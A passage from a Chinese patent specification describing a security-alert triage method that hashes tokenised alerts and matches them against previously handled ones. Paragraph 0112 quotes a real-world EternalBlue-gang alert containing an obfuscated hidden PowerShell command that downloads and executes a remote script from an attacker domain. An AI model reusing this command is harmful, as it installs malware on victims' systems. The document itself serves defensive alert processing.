家族团伙：永恒之蓝病毒团伙
[0112]
原始信息：“powershell
‑
w hidden ie`x(ne`w
‑
obj`ectnet.webc`lient).downloadstring(h**p://t.amynx.com/7p.php？0.9*ipc*system*tqhn*" [environment]::osversion.version.major)；bpu(h**p://t.amynx.com/ipc.jsp？0.9")”]
[0113]
按照上述方法，循环处理，将历史已处理的所有告警，按照上述格式处理后，存储到历史信息库中。该系统可以每隔预定时间执行一次，例如3小时，新增的已经处理的告警信息，但是还未添加到已处理名录库中的所有告警信息均可以按照上述流程处理，并存储到历史信息库中。利用该方式可以实现告警自动处理，节省人力，提高告警信息的处理效率。
[0114]
需要说明的是，对于前述的各方法实施例，为了简单描述，故将其都表述为一系列的动作组合，但是本领域技术人员应该知悉，本发明并不受所描述的动作顺序的限制，因为依据本发明，某些步骤可以采用其他顺序或者同时进行。其次，本领域技术人员也应该知悉，说明书中所描述的实施例均属于优选实施例，所涉及的动作和模块并不一定是本发明所必须的。
[0115]
根据本发明实施例的另一个方面，还提供了一种用于实施上述信息的处理方法的信息的处理装置。如图7所示，该装置包括：处理模块72，用于对待处理信息进行字符串转换处理，得到待处理字符串，其中，上述待处理信息用于提示出现待处理的错误信息；获取模块74，用于获取对上述待处理字符串进行划分后得到的分词集合，其中，上述分词集合中包括至少两个分词，上述至少两个分词中的每个分词包括至少两个字符；确定模块76，用于根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值；识别模块78，用于通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息；执行模块710，对上述待处理信息执行目标处理操作，其中，上述目标处理操作为对上述已处理信息执行的处理操作。
[0116]
可选地，上述装置用于通过如下方式实现上述根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值：获取上述分词集合中每个分词的哈希值，共得到一组哈希值；对上述一组哈希值和上述一组权重值进行加权求和，得到上述第一哈希值，其中，上述一组权重值与上述分词集合中的分词的类型对应。
[0117]
可选地，上述装置用于确定上述分词集合中的每个分词的类型，其中，上述每个分词的类型与上述每个分词在同一类型的待处理信息中出现的次数或频率匹配；根据上述每个分词的类型，确定上述每个分词对应的权重值，共得到上述一组权重值。
[0118]
可选地，上述装置用于通过如下方式实现上述确定上述分词集合中的每个分词的类型：在第一分词在第一类型的待处理信息中出现的次数大于第一阈值或者出现的频率大于第二阈值时，将上述第一分词的类型确定为预设的第一类型，其中，上述分词集合包括上述第一分词，上述第一类型对应的上述第一分词的权重值为第一权重值；在第二分词在上述第一类型的待处理信息中出现的次数小于上述第一阈值或者出现的频率小于上述第二阈值时，将上述第二分词的类型确定为预设的第二类型，其中，上述分词集合包括上述第二分词，上述第二类型对应的上述第二分词的权重值为第二权重值，上述第一权重值大于上述第二权重值。
[0119]
可选地，上述装置用于通过如下方式实现上述通过上述第一哈希值，在历史信息
库中识别与上述待处理信息匹配的已处理信息：获取上述第一哈希值与第二哈希值之间的相似度，其中，上述第二哈希值为上述已处理告警信息的哈希值，上述历史信息库中包括上述已处理信息以及上述第二哈希值；在上述相似度大于或等于预设阈值时，将上述已处理信息确定为与上述待处理信息匹配。
[0120]
可选地，上述装置还用于通过如下方式实现上述获取上述第一哈希值与第二哈希值之间的相似度：获取上述第一哈希值与上述第二哈希值之间的距离，其中，上述相似度包括上述距离。
[0121]
可选地，上述装置还用于通过如下方式实现上述通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息：获取上述第一哈希值与第二哈希值之间的相似度，其中，上述第二哈希值为上述已处理信息的哈希值，上述历史信息库中包括上述已处理信息以及上述第二哈希值；在上述相似度大于或等于预设阈值、且上述待处理信息中包括的第一威胁指标信息与上述已处理信息中包括的第二威胁指标信息相同时，将上述已处理信息确定为与上述待处理信息匹配。
[0122]
可选地，上述装置还用于在历史信息库中识别与上述待处理信息匹配的已处理信息之后，将上述待处理信息和上述已处理信息确定为同一类型的信息；将上述待处理信息和上述已处理信息确定为同一类型的信息，并将上述待处理信息以及上述待处理信息的信息类型记录在上述历史信息库中。
[0123]
可选地，上述装置还用于在上述历史信息库中识别不到与上述待处理信息匹配的已处理信息时，确定对上述待处理信息的第一处理操作；对上述待处理信息执行上述第一处理操作；将具有对应关系的上述待处理信息和上述第一处理操作记录在上述历史信息库中。
[0124]
可选地，上述装置还用于通过如下方式实现上述对待处理信息进行字符串转换处理，得到待处理字符串：在上述待处理信息中包括加密字符串时，将上述加密字符串解密成解密字符串；将上述解密字符串与上述待处理信息中除上述加密字符串之外的其他字符串，组成上述待处理字符串。
[0125]
可选地，上述装置还用于通过如下方式实现上述对上述待处理信息执行目标处理操作：在上述待处理信息中包括预设的威胁指标信息时，对上述待处理信息执行拦截操作，其中，上述目标处理操作包括上述拦截操作。
[0126]
可选地，上述装置还用于通过如下方式实现上述对上述待处理信息执行目标处理操作：在上述已处理信息包括多个信息时，对上述待处理信息执行第一处理操作，其中，上述目标处理操作包括上述第一处理操作，上述第一处理操作为对上述多个信息中的一个信息执行的处理操作。
[0127]
可选地，上述装置还用于通过如下方式实现上述对上述待处理信息执行第一处理操作：在多个处理操作中确定执行次数最多的一个处理操作，其中，上述多个处理操作是对上述多个信息执行的处理操作，上述多个信息的类型不同；对上述待处理信息执行上述第一处理操作。
[0128]
根据本发明实施例的又一个方面，还提供了一种用于实施上述信息的处理方法的电子设备，该电子设备可以是图1所示的终端设备或服务器。本实施例以该电子设备为服务器为例来说明。如图8所示，该电子设备包括存储器802和处理器804，该存储器802中存储有
计算机程序，该处理器804被设置为通过计算机程序执行上述任一项方法实施例中的步骤。
[0129]
可选地，在本实施例中，上述电子设备可以位于计算机网络的多个网络设备中的至少一个网络设备。
[0130]
可选地，在本实施例中，上述处理器可以被设置为通过计算机程序执行以下步骤：
[0131]
s1，对待处理信息进行字符串转换处理，得到待处理字符串，其中，上述待处理信息用于提示出现待处理的错误信息；
[0132]
其中，上述待处理信息可以是告警信息、提示信息或推送信息等。待处理信息用于提示开发人员存在待处理的错误信息，该错误信息可以是软件或硬件出现错误，例如开发软件过程中出现的任务报错，或者硬件设备出现故障的报错信息。不同类型的错误信息的格式可能不同，包含的内容存在差异。例如有些信息中包含“
”“‑”
等符号。为了防止“
”“‑”
等符号对个信息识别准确度的影响，需要对待处理信息进行字符串转换处理，将待处理信息转换为字符串，得到待处理的字符串。
[0133]
s2，获取对上述待处理字符串进行划分后得到的分词集合，其中，上述分词集合中包括至少两个分词，上述至少两个分词中的每个分词包括至少两个字符；
[0134]
其中，由于不同待处理信息中出现的分词的种类和频率不同，有些词语在某种类型的信息中出现的频率较高，该词语可以明显的标识该类信息，因此，可以基于分词区分不同类型的信息。对上述得到的待处理字符串进行分词处理，得到待处理信息对应的分词集合，基于分词集合可以对待处理信息进行识别。
[0135]
s3，根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值；
[0136]
其中，在不同类型的待处理信息中，分词权重一般是不同的，权重高的分词是能够起到标识该类信息的分词。以告警信息为例，在某种类型告警信息中，出现频率较高的分词的权重较高。而标准语句一般会出现在不同种类的告警信息中，对于此种分词的权重值较小。根据分词和对应的权重值可以得到待处理信息的哈希值，通过哈希值可以在历史信息库中查找到与待处理信息相似的已处理信息，使用已处理信息的处理方式对待处理信息进行处理，可以提高待处理信息的处理效率。
[0137]
s4，通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息；
[0138]
其中，历史信息库中存储了已处理信息，以及对已处理信息的处理方法。通过待处理信息的哈希值在历史信息库中查找与待处理信息相似的已处理信息，通过已处理信息的处理方式对待处理信息进行处理，可以提高待处理信息的处理效率。
[0139]
s5，对上述待处理信息执行目标处理操作，其中，上述目标处理操作为对上述已处理信息执行的处理操作。
[0140]
其中，目标处理操作是对历史信息库中已处理信息的处理方式，历史信息库中可以关联存储已处理信息以及对应的目标处理操作。由于待处理信息与已处理信息相似，可以直接采用已处理信息的处理方式对待处理信息进行处理，可以达到自动对待处理信息进行处理的目的，提高待处理信息的处理效率。
[0141]
可选地，本领域普通技术人员可以理解，图8所示的结构仅为示意，电子装置电子设备也可以是智能手机(如android手机、ios手机等)、平板电脑、掌上电脑以及移动互联网
设备(mobile internet devices，mid)、pad等终端设备。图8其并不对上述电子装置电子设备的结构造成限定。例如，电子装置电子设备还可包括比图8中所示更多或者更少的组件(如网络接口等)，或者具有与图8所示不同的配置。
[0142]
其中，存储器802可用于存储软件程序以及模块，如本发明实施例中的信息的处理方法和装置对应的程序指令/模块，处理器804通过运行存储在存储器802内的软件程序以及模块，从而执行各种功能应用以及数据处理，即实现上述的信息的处理方法。存储器802可包括高速随机存储器，还可以包括非易失性存储器，如一个或者多个磁性存储装置、闪存、或者其他非易失性固态存储器。在一些实例中，存储器802可进一步包括相对于处理器804远程设置的存储器，这些远程存储器可以通过网络连接至终端。上述网络的实例包括但不限于互联网、企业内部网、局域网、移动通信网及其组合。其中，存储器802具体可以但不限于用于存储历史信息库中已处理的告警等信息。作为一种示例，如图8所示，上述存储器1302中可以但不限于包括上述信息的处理装置中的处理模块72、获取模块74、确定模块76、识别模块78，及执行模块710。此外，还可以包括但不限于上述信息的处理装置中的其他模块单元，本示例中不再赘述。
[0143]
可选地，上述的传输装置806用于经由一个网络接收或者发送数据。上述的网络具体实例可包括有线网络及无线网络。在一个实例中，传输装置806包括一个网络适配器(network interface controller，nic)，其可通过网线与其他网络设备与路由器相连从而可与互联网或局域网进行通讯。在一个实例中，传输装置806为射频(radio frequency，rf)模块，其用于通过无线方式与互联网进行通讯。
[0144]
此外，上述电子设备还包括：显示器808，用于显示上述告警信息；和连接总线810，用于连接上述电子设备中的各个模块部件。
[0145]
在其他实施例中，上述终端设备或者服务器可以是一个分布式系统中的一个节点，其中，该分布式系统可以为区块链系统，该区块链系统可以是由该多个节点通过网络通信的形式连接形成的分布式系统。其中，节点之间可以组成点对点(p2p，peer to peer)网络，任意形式的计算设备，比如服务器、终端等电子设备都可以通过加入该点对点网络而成为该区块链系统中的一个节点。
[0146]
根据本技术的一个方面，提供了一种计算机程序产品或计算机程序，该计算机程序产品或计算机程序包括计算机指令，该计算机指令存储在计算机可读存储介质中。计算机设备的处理器从计算机可读存储介质读取该计算机指令，处理器执行该计算机指令，使得该计算机设备执行上述各种可选实现方式中提供的方法。其中，该计算机程序被设置为运行时执行上述任一项方法实施例中的步骤。
[0147]
可选地，在本实施例中，上述计算机可读的存储介质可以被设置为存储用于执行以下步骤的计算机程序：
[0148]
s1，对待处理信息进行字符串转换处理，得到待处理字符串，其中，上述待处理信息用于提示出现待处理的错误信息；
[0149]
其中，上述待处理信息可以是告警信息、提示信息或推送信息等。待处理信息用于提示开发人员存在待处理的错误信息，该错误信息可以是软件或硬件出现错误，例如开发软件过程中出现的任务报错，或者硬件设备出现故障的报错信息。不同类型的错误信息的格式可能不同，包含的内容存在差异。例如有些信息中包含“
”“‑”
等符号。为了防止“
”“‑”
等符号对个信息识别准确度的影响，需要对待处理信息进行字符串转换处理，将待处理信息转换为字符串，得到待处理的字符串。
[0150]
s2，获取对上述待处理字符串进行划分后得到的分词集合，其中，上述分词集合中包括至少两个分词，上述至少两个分词中的每个分词包括至少两个字符；
[0151]
其中，由于不同待处理信息中出现的分词的种类和频率不同，有些词语在某种类型的信息中出现的频率较高，该词语可以明显的标识该类信息，因此，可以基于分词区分不同类型的信息。对上述得到的待处理字符串进行分词处理，得到待处理信息对应的分词集合，基于分词集合可以对待处理信息进行识别。
[0152]
s3，根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值；
[0153]
其中，在不同类型的待处理信息中，分词权重一般是不同的，权重高的分词是能够起到标识该类信息的分词。以告警信息为例，在某种类型告警信息中，出现频率较高的分词的权重较高。而标准语句一般会出现在不同种类的告警信息中，对于此种分词的权重值较小。根据分词和对应的权重值可以得到待处理信息的哈希值，通过哈希值可以在历史信息库中查找到与待处理信息相似的已处理信息，使用已处理信息的处理方式对待处理信息进行处理，可以提高待处理信息的处理效率。
[0154]
s4，通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息；
[0155]
其中，历史信息库中存储了已处理信息，以及对已处理信息的处理方法。通过待处理信息的哈希值在历史信息库中查找与待处理信息相似的已处理信息，通过已处理信息的处理方式对待处理信息进行处理，可以提高待处理信息的处理效率。
[0156]
s5，对上述待处理信息执行目标处理操作，其中，上述目标处理操作为对上述已处理信息执行的处理操作。
[0157]
其中，目标处理操作是对历史信息库中已处理信息的处理方式，历史信息库中可以关联存储已处理信息以及对应的目标处理操作。由于待处理信息与已处理信息相似，可以直接采用已处理信息的处理方式对待处理信息进行处理，可以达到自动对待处理信息进行处理的目的，提高待处理信息的处理效率。
[0158]
可选地，在本实施例中，本领域普通技术人员可以理解上述实施例的各种方法中的全部或部分步骤是可以通过程序来指令终端设备相关的硬件来完成，该程序可以存储于一计算机可读存储介质中，存储介质可以包括：闪存盘、只读存储器(read
‑
only memory，rom)、随机存取器(random access memory，ram)、磁盘或光盘等。
[0159]
上述本发明实施例序号仅仅为了描述，不代表实施例的优劣。
[0160]
上述实施例中的集成的单元如果以软件功能单元的形式实现并作为独立的产品销售或使用时，可以存储在上述计算机可读取的存储介质中。基于这样的理解，本发明的技术方案本质上或者说对现有技术做出贡献的部分或者该技术方案的全部或部分可以以软件产品的形式体现出来，该计算机软件产品存储在存储介质中，包括若干指令用以使得一台或多台计算机设备(可为个人计算机、服务器或者网络设备等)执行本发明各个实施例所述方法的全部或部分步骤。
[0161]
在本发明的上述实施例中，对各个实施例的描述都各有侧重，某个实施例中没有
详述的部分，可以参见其他实施例的相关描述。
[0162]
在本技术所提供的几个实施例中，应该理解到，所揭露的客户端，可通过其它的方式实现。其中，以上所描述的装置实施例仅仅是示意性的，例如所述单元的划分，仅仅为一种逻辑功能划分，实际实现时可以有另外的划分方式，例如多个单元或组件可以结合或者可以集成到另一个系统，或一些特征可以忽略，或不执行。另一点，所显示或讨论的相互之间的耦合或直接耦合或通信连接可以是通过一些接口，单元或模块的间接耦合或通信连接，可以是电性或其它的形式。
[0163]
所述作为分离部件说明的单元可以是或者也可以不是物理上分开的，作为单元显示的部件可以是或者也可以不是物理单元，即可以位于一个地方，或者也可以分布到多个网络单元上。可以根据实际的需要选择其中的部分或者全部单元来实现本实施例方案的目的。
[0164]
另外，在本发明各个实施例中的各功能单元可以集成在一个处理单元中，也可以是各个单元单独物理存在，也可以两个或两个以上单元集成在一个单元中。上述集成的单元既可以采用硬件的形式实现，也可以采用软件功能单元的形式实现。
[0165]
以上所述仅是本发明的优选实施方式，应当指出，对于本技术领域的普通技术人员来说，在不脱离本发明原理的前提下，还可以做出若干改进和润饰，这些改进和润饰也应视为本发明的保护范围。